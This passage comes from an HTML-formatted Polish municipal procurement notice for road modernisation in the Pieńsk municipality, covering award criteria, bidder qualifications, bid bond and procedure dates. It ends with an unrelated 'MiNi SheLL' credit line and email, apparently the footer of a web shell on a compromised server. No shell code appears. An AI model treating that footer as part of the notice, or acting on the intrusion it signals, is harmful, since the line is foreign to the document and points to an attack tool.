osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin usunięcia wad i usterek w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej<br/>Warunek będzie uznany za spełniony, jeżeli Wykonawca przedłoży dokument potwierdzający, że jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną nie mniejszą niż 5 000 000,00 zł (słownie złotych: pięć milionów 00/100)<br/>2) zdolności technicznej lub zawodowej:<br/>a) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie oraz zgodnie z<br/>przepisami prawa budowlanego i prawidłowo ukończone co najmniej cztery roboty budowlane, polegające na budowie,<br/>przebudowie, rozbudowie lub modernizacji dróg o nawierzchni bitumicznej i o następujących wartościach inwestycji:<br/>- dwie drogi o wartości nie mniejszej niż 5 200 000,00zł brutto - wartości dla każdej inwestycji z osobna,<br/>- dwie drogi o wartości nie mniejszej niż 4 400 000,00zł brutto – wartość łączna dla dwóch inwestycji.<br/>b) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował przynajmniej<br/>jedną osobą lub osobami, które będą uczestniczyć w realizacji zamówienia posiadającymi uprawienia zgodnie z wymogami<br/>ustawy Prawo budowlane ( tekst jedn.: Dz.U. 2021r. Poz. 2351 ze zm.) do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie w branży drogowej, bez ograniczeń.<br/>W przypadku podmiotów zagranicznych posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej<br/>wymaga się od Wykonawcy, aby osoby te posiadały równoważne uprawnienia do w/w.<br/>Zamawiający uzna uprawnienia równoważne zdobyte na podstawie przepisów obowiązujących przed wejściem w życie<br/>ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy– w oparciu o art. 104 ustawy z dnia 7<br/>lipca 1994r. – Prawo budowlane (t.j. Dz. U. 2021 r. poz. 2351 ze zm.).<br/>Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu<br/>imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych<br/>lub doświadczeniu tych osób. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) odpisu lub informacji z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji informacji o Działalności Gospodarczej, w zakresie art.109 ust.1 pkt 4<br/>ustawy, sporządzonych nie wcześniej niż<br/>3miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji. 2)oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencjii konsumentów (t.j. Dz. U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą, który złożył<br/>odrębnąofertę,ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do<br/>udziału wpostępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej3)<br/>W przypadku wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na<br/>zasadach określonych wart. 118 ustawy, Zamawiający żąda przedstawienia w odniesieniu do tych<br/>podmiotów dokument wymieniony w pkt IX.4.1).4) Zamawiający żąda od wykonawcy<br/>przedstawienia dokumentów wymienionych w pkt IX.4.1),dotyczących podwykonawcy, któremu<br/>zamierza powierzyć wykonanie części zamówienia, a który nie jest podmiotem, na którego zdolnościach<br/>lub sytuacji wykonawca polega na zasadach określonych w art. 118 ustawy.5) W przypadku<br/>wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty wymienione w pkt. IX.4.1)<br/>winien dołączyć każdy podmiot występujący wspólnie. Dokument winien być potwierdzony za zgodność<br/>z oryginałem i złożony w formie elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym zgodnie z § 14 ust. 3Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23<br/>grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy.6) Jeżeli wykonawca ma siedzibę lub<br/>miejsce zamieszkaniapoza terytorium Rzeczpospolitej Polskiej,zamiast dokumentów, o których mowa<br/>w pkt IX.4.1)składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub<br/>miejscezamieszkania,potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono<br/>upadłości, jegoaktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego<br/>działalnośćgospodarcza nie jest zawieszona ani nie znajduje się on winnej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokumenty powinnybyć wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania<br/>ofert.7) Jeżeli w kraju, wktórym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce<br/>zamieszkania ma osoba, którejdokument dotyczy,nie wydaje się dokumentów, o których mowa w pkt<br/>IX.4. ppkt.5, zastępuje się jeodpowiednio w całości lub w części dokumentem zawierającym<br/>odpowiednio oświadczeniewykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenieosoby, której dokument miał dotyczyć, złożone pod przysięgą, lub,<br/>jeżeli w kraju, w którym wykonawcama siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przedorganem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lubgospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania wykonawcy. Dokumentypowinny być wystawione nie wcześniej niż 3 miesięcy przed<br/>upływem terminu składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Dokument potwierdzający, że wykonawca jest ubezpieczony<br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie<br/>mniejszą niż 5 000 000,00 zł (słownie złotych: pięć milionów 00/100).2) Wykazu robót budowlanych wykonanych nie wcześniej niż w<br/>okresie ostatnich 5lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających,czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na<br/>rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty. 3) Wykazu osób,<br/>skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych zaświadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami.4) Dokumentów dotyczących<br/>podmiotu trzeciego, w celu wykazania spełnienia, w zakresie, w jakim Wykonawca powołuje się na jego<br/>zasoby,warunków udziału w postępowaniu jeżeli wykonawca polega na zasobach podmiotu<br/>trzeciego.Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez<br/>zamawiającego podmiotowych środków dowodowych, wykonawca składa inne podmiotowe środki<br/>dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego<br/>warunku udziału w postępowaniu lub kryterium selekcji dotyczącego sytuacji ekonomicznej lub<br/>finansowej. 5) Powyższe dokumenty należy złożyć w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie<br/>elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj.<br/>podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony f o r m u l a r z o f e r t y – załącznik do siwz2) Wykonawca dołącza do<br/>oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu w zakresie wskazanym w SWZ. Oświadczenie to stanowi dowód potwierdzający<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień<br/>składania ofert,tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w SWZ.3)Oryginał<br/>pełnomocnictwa do działania w imieniu wykonawcy lub notarialnie potwierdzony<br/>odpispełnomocnictwa, w przypadku, gdy wykonawcę reprezentuje Pełnomocnik o ile prawo<br/>dopodpisania oferty nie wynika z dokumentów, do których Zamawiający ma dostęp bądź z<br/>innychdokumentów dołączonych do oferty. Treść pełnomocnictwa musi jednoznacznie<br/>określaćczynności, co do wykonywania których pełnomocnik jest upoważniony. 4) Dowód<br/>wniesienia w ad i u m z dopiskiem zawierającym oznaczenie postępowania oraz z określeniem<br/>sposobu zwrotuwadium;5) Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do<br/>dyspozycjiniezbędnych zasobów na potrzeby wykonania zamówienia - jeżeli wykonawca,<br/>zgodnie z art.125 ust. 5 ustawy, polega na zdolnościach lub sytuacji innych podmiotów,<br/>niezależnie odcharakteru prawnego łączących go z nimi stosunków, o czym mowa w punktach<br/>IX.6.1) – 7).6)W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wykonawcyzobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z<br/>którego treścibędzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie<br/>zamówienia tychwykonawców należy załączyć do oferty.Pełnomocnictwo powinno być<br/>załączone do oferty i powinno zawierać w szczególności wskazanie:- postępowania o<br/>zamówienie publiczne, którego dotyczy,- wszystkich wykonawców ubiegających się wspólnie o<br/>udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,- ustanowionego<br/>pełnomocnika oraz zakresu jego umocowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w<br/>kwocie: 100 000,00 zł (słownie złotych: sto tysięcy 00/100).<br/>2. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>3. Wadium musi obejmować pełen okres związania ofertą.<br/>4. Wadium musi być wniesione przed upływem terminu składania ofert.<br/>Wadium wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy: Bank Spółdzielczy w Pieńsku 60<br/>8382 0001 0000 0202 2000 0060, z oznaczeniem: tryb podstawowy na zadanie pn: „Modernizacja dróg gminnych na terenie<br/>miasta i gminy Pieńsk ”. Wadium musi być na koncie Zamawiającego przed upływem terminu składania ofert.<br/>5. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać<br/>następujące elementy:<br/>1) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie<br/>ich siedzib. Beneficjentem wskazanym<br/>w gwarancji lub poręczeniu musi być Gmina Pieńsk,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>3) kwotę gwarancji/poręczenia,<br/>4) termin ważności gwarancji/poręczenia,<br/>5) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie<br/>zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp.<br/>8) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim<br/>przypadkuwykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzieleniezamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówieniapublicznego. Do oferty należy załączyć pełnomocnictwo podpisane przez<br/>upoważnionychprzedstawicieli wszystkich pozostałych wykonawców w formie oryginału lub kopii<br/>poświadczonejza zgodność z oryginałem przez notariusza. Złożona oferta musi być podpisana w<br/>taki sposób,by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.<br/>Pełnomocnictwoskłada się w oryginale lub kopii poświadczonej notarialnie.2. W odniesieniu do<br/>wymagańpostawionych przez Zamawiającego, każdy z wykonawców występujących wspólnie<br/>musiudokumentować, że nie podlega wykluczeniu na podstawie art. 108 ust. 1 i 2 oraz 109 ust.1<br/>pkt.4,5,7-10 ustawy. Warunki udziału w postępowaniu określone w art. 112 ust. 2 pkt 2-3<br/>ustawyPZP (pkt VII SIWZ) musi spełniać co najmniej jeden wykonawca samodzielnie lub<br/>wszyscywykonawcy łącznie. 3. Wszelka korespondencja oraz rozliczenia dokonywane będą<br/>wyłącznie zpełnomocnikiem.4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>publicznegoponoszą solidarną odpowiedzialność za wykonanie umowy oraz za szkody powstałe<br/>z tytułuczynów niedozwolonych.5. Jeżeli oferta Wykonawców wspólnie ubiegających się o<br/>udzieleniezamówienia, zostanie wybrana jako najkorzystniejsza, Zamawiający zobowiązuje<br/>wykonawcówprzed zawarciem umowy w sprawie zamówienia publicznego, do przedłożenia umowy regulującej współpracę<br/>tych podmiotów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający przewiduje udzielenie zaliczki na poczet wykonania zamówienia. Zamawiający, tytułem przedpłaty za<br/>realizację przedmiotu umowy, w terminie 14 od dnia doręczenia Zamawiającemu prawidłowo wystawionej faktury<br/>zaliczkowej, wypłaci Wykonawcy zaliczkę<br/>w wysokości 5% umownego wynagrodzenia brutto, która stanowi udział własny Zamawiającego zgodnie z warunkami<br/>Promesy Wstępnej dotyczącej dofinansowania inwestycji z Programu Rządowy Fundusz Polski Ład: Program Inwestycji<br/>Strategicznych (Nr Promesy: 01/2021/5991/PolskiLad). <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami §14. 1 projektu umowy który stanowi załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-29 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia,zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP https://epuap.gov.pl/wps/portal iudostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-29 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Nie dotyczy

Creat By MiNi SheLL
Email: jattceo@gmail.com